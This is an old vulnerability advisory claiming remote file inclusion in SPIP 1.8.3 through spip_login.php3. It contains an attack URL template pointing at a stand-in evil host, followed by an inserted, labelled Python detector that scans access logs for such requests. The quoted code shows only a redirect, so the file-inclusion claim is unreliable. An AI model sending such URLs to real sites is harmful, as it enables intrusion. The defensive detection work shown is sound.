Vulnerabilities in SPIP
------------------------------------------------------------------------------
>=- Remote file inclusion in SPIP
Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April 8th, 2006
Risk : High
>=- Software description
SPIP is a CMS portal with multilanguage support
Version : 1.8.3
URL : http://www.spip.net
>=- The vulnerability
http://[victim]/[spip_dir]/spip_login.php3?url=[Evil_url]
---spip_login.php3---------------------------------------------------------------
............
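// If the request URI contains 'var_url', redirect to the same URI
// with 'var_url' renamed to 'url'.
if (isset($_SERVER['REQUEST_URI'])
    AND strpos($_SERVER['REQUEST_URI'], 'var_url'))
    @header('Location: '.str_replace('var_url', 'url',
        $_SERVER['REQUEST_URI']));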
............
---spip_login.php3---------------------------------------------------------------
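Added example, not part of the original advisory and not SPIP code: a Python check that scans web access logs for requests to spip_login.php3 whose url or var_url parameter carries an absolute or protocol-relative target, which is the request pattern shown above. The "combined" log layout, the helper names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script and parameter names are taken from the advisory; the "combined"
# access-log layout and every sample line below are constructed assumptions.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT = "spip_login.php3"
PARAMS = ("url", "var_url")
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Apr/2006:10:00:01 +0000] "GET /spip/spip_login.php3?url=ecrire/index.php3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Apr/2006:10:00:05 +0000] "GET /spip/spip_login.php3?url=http://files.example.test/a.txt HTTP/1.1" 200 310',
    '198.51.100.7 - - [08/Apr/2006:10:00:09 +0000] "GET /spip/spip_login.php3?var_url=http%3A%2F%2Ffiles.example.test%2Fa.txt HTTP/1.1" 302 0',
    '192.0.2.10 - - [08/Apr/2006:10:00:12 +0000] "GET /spip/article.php3?url=http://other.example.test/ HTTP/1.1" 200 900',
]

def is_external(value):
    """Return True if the parameter value points off-site."""
    for _ in range(3):  # undo up to three layers of percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.strip().replace("\\", "/")
    if value.startswith("//"):  # protocol-relative target
        return True
    # Any explicit scheme (http:, ftp:, ...) is treated as off-site.
    return bool(re.match(r"^[a-z][a-z0-9+.-]*:", value, re.I))

def suspicious_requests(log_lines):
    """Return (line_number, parameter, value) for each off-site target."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith("/" + SCRIPT):
            continue
        # parse_qs percent-decodes each value once.
        query = parse_qs(target.query, keep_blank_values=True)
        for name in PARAMS:
            for value in query.get(name, []):
                if is_external(value):
                    hits.append((number, name, value))
    return hits

if __name__ == "__main__":
    print(suspicious_requests(SAMPLE_LOG))
```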
>=- Vendor
Not contacted yet
>=- Shoutz
~ kecoak (cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc)
~ echo staff
(y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,the day)
~ Ph03n1x,spyoff,ghoz,r34d3r,m_beben,slackX,sakitjiwa,xnuxer
>=- Contact
crasher@xxxxxxxxxxxx || http://www.kecoak.or.id